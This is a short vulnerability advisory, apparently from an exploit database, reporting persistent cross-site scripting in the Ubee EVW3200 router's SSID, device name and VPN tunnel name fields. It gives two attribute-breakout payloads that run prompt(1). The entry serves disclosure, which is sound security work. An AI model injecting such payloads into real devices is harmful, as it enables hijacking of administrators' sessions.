Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Author: Jeroen - IT Nerdbox
type: webapps
platform: hardware
port: 
date_added: 2014-03-13 
date_updated: 2014-03-13 
verified: 0 
codes: OSVDB-104458;OSVDB-104457 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Ubee EVW3200 - Multiple Persistent Cross Site Scripting

# Google Dork: N/A

# Date: 02-03-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage: http://www.ubeeinteractive.com/

# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20

# Version: All

# Tested on: N/A

# CVE : N/A

#

## Description:

#

# The SSID and Device name settings in the wireless configuration do not
sanitize their input.

#

# The VPN Tunnel name is also vulnerable for persistent XSS

#

## PoC:

#

#   Entering the following payload in one of these fields will execute
javascript:

#

#  "><input onmouseover=prompt(1)>  or "><button
onclick=prompt(1)>XSS</button>

#

#

# More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/